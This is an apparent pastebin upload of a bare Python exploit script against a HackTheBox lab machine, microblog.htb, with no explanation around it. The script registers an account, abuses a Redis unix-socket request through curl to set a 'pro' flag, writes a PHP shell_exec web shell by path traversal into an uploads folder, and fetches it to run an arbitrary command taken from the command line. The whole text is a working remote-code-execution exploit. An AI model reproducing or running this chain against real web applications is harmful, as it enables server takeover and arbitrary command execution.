Untitled

avatar
unknown
plain_text
2 years ago
3.5 kB
3
Indexable
import requests
import re
import sys
import os

my_session = requests.Session()
proxy = {"http": "http://127.0.0.1:8080"}
user = "test"


def get_cookies(force):
    if (requests.get("http://a.microblog.htb").status_code == 404 or force):
        print("Fckin page data was cleaned out, registering again")
        register_url = "http://app.microblog.htb:80/register/index.php"
        register_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
                            "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/register/", "Upgrade-Insecure-Requests": "1"}
        register_data = {"first-name": user, "last-name": "asd",
                         "username": user, "password": "asd"}
        my_session.post(register_url, headers=register_headers,
                        data=register_data, proxies=proxy)
    else:
        login_url = "http://app.microblog.htb:80/login/index.php"
        login_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3",
                         "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/login/", "Upgrade-Insecure-Requests": "1"}
        login_data = {"username": user, "password": "asd"}
        r = my_session.post(login_url, headers=login_headers,
                            data=login_data, proxies=proxy)
        if "failed" in r.headers:
            get_cookies(True)


def add_blog():
    add_blog_url = "http://app.microblog.htb:80/dashboard/index.php"
    add_blog_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://app.microblog.htb", "Connection": "close", "Referer": "http://app.microblog.htb/dashboard/?message=Registration%20successful!&status=success", "Upgrade-Insecure-Requests": "1"}
    add_blog_data = {"new-blog-name": "a"}
    r = my_session.post(
        add_blog_url, headers=add_blog_headers, data=add_blog_data, proxies=proxy)


def add_pro_feature(user):
    os.system(
        f"curl -X \"HSET\" 'http://microblog.htb/static/unix:/var/run/redis/redis.sock:{user}%20pro%20true%20a/b'")


def upload_file(command):
    php_command = f'<?php shell_exec("{command}");?>'
    url = "http://a.microblog.htb:80/edit/index.php"
    post_data = {"id": "../uploads/test.php", "txt": php_command}
    r = my_session.post(url, data=post_data, proxies=proxy)


def execute_file():
    url = "http://a.microblog.htb:80/uploads/test.php"
    my_session.get(url, proxies=proxy)


def execute_code(command):
    upload_file(command)
    execute_file()


get_cookies(False)
add_blog()
add_pro_feature(user)
execute_code(sys.argv[1])
Editor is loading...